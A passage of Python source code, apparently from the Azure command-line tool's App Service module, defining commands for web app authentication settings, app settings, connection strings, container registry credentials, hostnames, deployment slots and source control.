poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
